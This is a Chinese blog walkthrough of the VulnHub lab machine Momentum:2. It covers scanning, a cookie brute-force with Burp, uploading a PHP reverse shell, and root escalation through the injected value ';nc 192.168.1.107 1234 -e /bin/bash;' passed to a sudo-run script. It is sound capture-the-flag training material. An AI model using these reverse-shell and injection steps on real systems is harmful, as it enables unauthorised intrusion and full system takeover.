VulnHub靶机_MOMENTUM: 2

最新推荐文章于 2024-05-06 15:52:06 发布
最新推荐文章于 2024-05-06 15:52:06 发布
阅读量634 收藏 3
点赞数 2
分类专栏: 靶机 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39368364/article/details/120104079
版权

文章目录

靶机介绍

这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1
下载地址:http://www.vulnhub.com/entry/momentum-2,702/
难度:中等
描述:关键词curl, bash, code review

渗透过程

靶机IP获取

靶机的IP为192.168.1.105。

arp-scan -l

在这里插入图片描述

端口扫描

靶机开放了22和80端口。

nmap -A -T4 -p 1-65535 192.168.1.105

在这里插入图片描述

信息收集
  1. 首先扫描以下网站中的特殊文件,这里我一开始用的dirb,但是dirb竟然好多东西没有扫出来,卡住了好久,于是乎用gobuster又扫一遍,这里还要加上.php.bak类型文件,也是绝绝子。
gobuster dir -u http://192.168.1.105/ -x html,php,bak,txt,php.bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

信息1

访问扫描出的网址:http://192.168.1.105/dashboard.html,可以看到一个文件上传接口。
在这里插入图片描述

信息2

网址http://192.168.1.105/ajax.php.bak 中的代码下载下来,里面的内容是cookie的最后一个字母是额外添加的一个大写字母。然后如果是admin,并且cookie也正确,还需要提交一个post,设置secure等于val1d,就可以上传pdf,php,txt类型的文件,否则只能上传txt文件。
在这里插入图片描述
我们先传一个txt文件,然后查看,发现owl这个目录中出现了我们上传的文件。
在这里插入图片描述
在这里插入图片描述

burpsuite抓包改包

那么,现在的思路就是首先伪造admin的cookie,上传一个php反弹shell的脚本上去。
首先使用burpsuite抓包,先要进行一些设置。

  1. 在kali中启动burpsuite,直接命令行输入burpsuite即可。
  2. 在Proxy下点击Options,看到interface是127.0.0.1:8080。
  3. 在浏览器中的Internet Option中设置相同的IP地址以及端口号。
    在这里插入图片描述
  4. 抓包
    上传kali自带的php-reverse-shell文件(记得改ip为kali的IP),然后查看Proxy——intercept目录下抓到的包,我们点击Action——sendtointruder。点击payload,把cookie那里最后一个字母给爆破出来。爆破就是点击intruder,然后payloads,然后设置26个字母。
    此外,还要使用post方式提交一个参数secure,值为val1d。(爆破成功的话上传回显1)
    在这里插入图片描述

在这里插入图片描述
点击Start attack,查看Response,发现只有R返回值是1。
在这里插入图片描述
5. 改包
把最后Cookie最后一位改成R,然后点击Forward,这时候还没有退出burpsuite的话就一直点Forward就行。
在这里插入图片描述
查看OWL网址就能看见我们上传的脚本了。
在这里插入图片描述
把浏览器网络设置改回来。
在这里插入图片描述

获取shell

nc监听1234端口(php反弹shell脚本中设置的端口)。

nc -lnvp 1234

然后点击owl网址中我们上传的脚本,这样我们就得到了shell。
在这里插入图片描述

提权
信息收集

首先在home目录下得到一个用户名和密码。
用户名:Athena
密码:myvulnerableapp* (Asterisk是*的意思)
在这里插入图片描述

ssh登录

用上述账号和密码登录ssh,查看sudo -l,这里说Athena能够使用的sudo权限中有用python3执行cookie-gen.py这个文件。
在这里插入图片描述
查看cookie-gen.py这个文件。我用nano打开,这里提示没有权限改。分析这个脚本的内容,他会接受一个输入作为seed,然后生成一个cookie。关键是,他会构造一个命令行,并且执行。
在这里插入图片描述
那我们就可以在输入seed的时候构造一下子,去得到root权限的shell。

;nc 192.168.1.107 1234 -e /bin/bash;

在这里插入图片描述
在这里插入图片描述
拿到了第二个flag。
在这里插入图片描述

完结~

Yiru Zhao
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Momentum2-靶机
薛定谔嘚喵博客
04-09 358
靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
Momentum:2靶机渗透测试
weixin_49340699的博客
07-13 518
Momentum:2靶机渗透测试流程 流程 用netdiscover对目标网段进行扫描 得到目标主机192.168.19.140 使用nmap对该主机进行端口扫描 得到端口22与80端口是开启的 上80端口看到只有三张图片就对目录进行爆破 gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt ht
Momentum靶机系列Momentum2
最新发布
m0_74950307的博客
05-06 1036
所以只需要上传一个监听代码就可以进行对靶机的监听,而且还获得了root权限:所以运行该脚本,并输入;//使用 open() 方法设置请求的类型为 POST,URL 为 "ajax.php",并指定使用异步方式发送请求(第三个参数为 true)//formData.append() 是 FormData 对象提供的方法,用于向表单数据对象中添加字段和值。简单来说就是,存在文件上传,上传的文件会添加到表单文件中 而且要想上传文件后就需要进行这串代码的过滤。//老板让我在饼干的末尾再添加一个大写字母。
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
Aluxian_的博客
09-09 737
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
渗透测试实战-vulnhub靶机 momentum-2
xnxqwzy的博客
07-31 178
查看kali IP地址ip a所在网段为 192.168.74.0/24使用nmap扫描整个网段扫描结果显示靶机地址疑似为 192.168.74.131扫描该地址的端口情况发现只开放了22和80端口尝试访问web服务似乎只是个静态页面查看网页源码没有什么特别的线索扫描整个网站目录这里文件上传到ajax.php进行处理,前端没有任何过滤限制尝试上传一个jpg文件,上传失败,后端存在文件限制查看ajax.php.bak。
Momentum靶机渗透Momentum1
m0_74950307的博客
12-22 165
这段代码使用了 AES 解密算法,使用了一个名为 "SecretPassphraseMomentum" 的密钥。查看了大佬的资料,他是使用了 ss -nltup 是一个在 Linux 系统中查询网络连接和监听端口信息的命令。是一个aes加密代码,进行解码,知道解码的密钥 SecretPassphraseMomentum。获得了kali的ip:192.168.13.138。看来还是不对,需要获得root的密码,或者进行夺权。获得了靶机的IP:192168.13.141。开启了22的tcp端口: ssh服务,
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4510
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
靶机渗透练习80-Momentum:1
hirak0的博客
04-21 936
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-1,685/ Description Info: easy / medium 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.78 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMw
redis的安装及简单实用(Linux下)
u013343076的专栏
03-19 849
简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同
Momentum1-靶机
薛定谔嘚喵博客
04-10 158
靶机通过信息收集发现AES加密秘钥以及XSS漏洞,利用beef-xss工具拿到cookie,解密后得到了账户密码,ssh登录后通过使用linpeas.sh脚本信息收集发现开着Redis,利用redis-cli拿到root密码信息收集发现AES有加密XSS漏洞利用,通过beef-xss工具获得cookie值得到cookie值尝试AES解密得到账户密码redis-cli的使用,获得root密码。
靶场练习第二十二天~vulnhub靶场之Momentum-2
qq_57976347的博客
02-20 630
一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share
Momentum靶机打靶过程及思路
qq_52610024的博客
05-16 131
直接解密,https//codepen.io/omararcus/pen/QWwBdmo,得到解密后的内。3.发现main.js下存在注释,其中有解密用的秘钥,在cryptojsexample平台上可以。5.开始进行提权,利用内核漏洞进行提权均失败,查看到etc/passwd下存在redis账号,GETrootpass得到一个密码,su后成功切换到root权限打靶完成。ss-pantu查看靶机开放的所有端口,发现6379端口确实开放。4.思考到可能为账号密码,ssh登录尝试成功,外围打点完成。...
靶机渗透练习81-Momentum:2
hirak0的博客
04-24 1000
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-2,702/ Description Difficulty : medium Keywords : curl, bash, code review This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.79 注:靶机与Kali的IP地址只
vulnhub-Momentum2
plant1234的博客
08-30 519
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值